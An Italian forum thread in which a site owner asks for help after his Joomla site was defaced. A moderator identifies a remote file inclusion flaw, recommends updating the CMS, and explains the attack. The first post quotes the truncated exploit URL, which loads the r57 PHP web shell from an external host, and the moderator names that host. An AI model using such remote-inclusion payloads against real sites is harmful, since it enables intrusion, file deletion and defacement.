Visualizzazione dei risultati da 1 a 8 su 8

Discussione: Sito joomla defacciato

  1. #1
    Utente di HTML.it
    Registrato dal
    Dec 2006
    Messaggi
    14

    Sito joomla defacciato

    il sito in questione è www.errabundimusici.it

    ho contattato il defacciatore, 17enne turco, che dopo avermi preso un po per il sedere
    riguardo gli europei
    mi dice che ha sfruttato questo bug
    http://www.errabundimusici.it/ultime...ell.in/r57.txt

    che posso fare per correggere il tutto?

    inoltre devo trovare il modo di riprendermi la vecchia home...

    ma come si fa a recuperare il vecchio index.php...

  2. #2
    Moderatore di Sicurezza informatica e virus L'avatar di Habanero
    Registrato dal
    Jun 2001
    Messaggi
    9,782
    La vulnerabilità usata è una remote inclusion presente fino alla versione 1.0.14 di Joomla.
    http://secunia.com/advisories/29106/

    Per risolvere il problema ti consiglio caldamante di aggiornare il tuo CMS all'ultima versione.

    A meno che sia stata rinominata e lasciata sul server la tua vecchia home è quasi sicuramente persa.
    Leggi il REGOLAMENTO!

    E' molto complicato, un mucchio di input e output, una quantità di informazioni, un mucchio di elementi da considerare, ho una quantità di elementi da tener presente...
    Drugo

  3. #3
    Utente di HTML.it
    Registrato dal
    May 2008
    Messaggi
    92
    Puoi recuperarla dalla cache di google..almeno spero!!

  4. #4
    Utente di HTML.it
    Registrato dal
    May 2008
    Messaggi
    92
    Ciao

    Scusa Habanero ma cosa succederebbe cn quella stringa?

    Entri nell'amministrazione?

    Ciao e grazie!

  5. #5
    Moderatore di Sicurezza informatica e virus L'avatar di Habanero
    Registrato dal
    Jun 2001
    Messaggi
    9,782
    Originariamente inviato da Analyzer
    Ciao

    Scusa Habanero ma cosa succederebbe cn quella stringa?

    Entri nell'amministrazione?

    Ciao e grazie!

    No... con quella stringa fai si che del codice php recuperato da un server esterno (per la precisione da http://www.r57shell.in/r57.txt) venga eseguito sul tuo server. Immagina cosa succede (come in effetti succede) se quel codice php agisce sul filesystem locale... cancellazione di file, modifica di file etc...
    Leggi il REGOLAMENTO!

    E' molto complicato, un mucchio di input e output, una quantità di informazioni, un mucchio di elementi da considerare, ho una quantità di elementi da tener presente...
    Drugo

  6. #6
    Moderatore di Sicurezza informatica e virus L'avatar di Habanero
    Registrato dal
    Jun 2001
    Messaggi
    9,782
    Originariamente inviato da Analyzer
    Puoi recuperarla dalla cache di google..almeno spero!!
    speri male... google non può certo recuperare il codice lato server di un sito!!!!
    Leggi il REGOLAMENTO!

    E' molto complicato, un mucchio di input e output, una quantità di informazioni, un mucchio di elementi da considerare, ho una quantità di elementi da tener presente...
    Drugo

  7. #7
    Utente di HTML.it
    Registrato dal
    Dec 2006
    Messaggi
    14
    Ragazzi ho aggiornato il csm ed è ritornato tutto a posto
    anche la home

    il tipo praticamente ha caricato sul mio server un sacco di porcherie
    addirittura un archivio....

    ma come si fa a fare ste cose?

    incredibile

  8. #8
    Moderatore di Sicurezza informatica e virus L'avatar di Habanero
    Registrato dal
    Jun 2001
    Messaggi
    9,782
    Originariamente inviato da Argon
    ma come si fa a fare ste cose?

    Originariamente inviato da Habanero
    No... con quella stringa fai si che del codice php recuperato da un server esterno (per la precisione da http://www.r57shell.in/r57.txt) venga eseguito sul tuo server. Immagina cosa succede (come in effetti succede) se quel codice php agisce sul filesystem locale... cancellazione di file, modifica di file etc...
    Leggi il REGOLAMENTO!

    E' molto complicato, un mucchio di input e output, una quantità di informazioni, un mucchio di elementi da considerare, ho una quantità di elementi da tener presente...
    Drugo

Permessi di invio

  • Non puoi inserire discussioni
  • Non puoi inserire repliche
  • Non puoi inserire allegati
  • Non puoi modificare i tuoi messaggi
  •  
Powered by vBulletin® Version 4.2.1
Copyright © 2025 vBulletin Solutions, Inc. All rights reserved.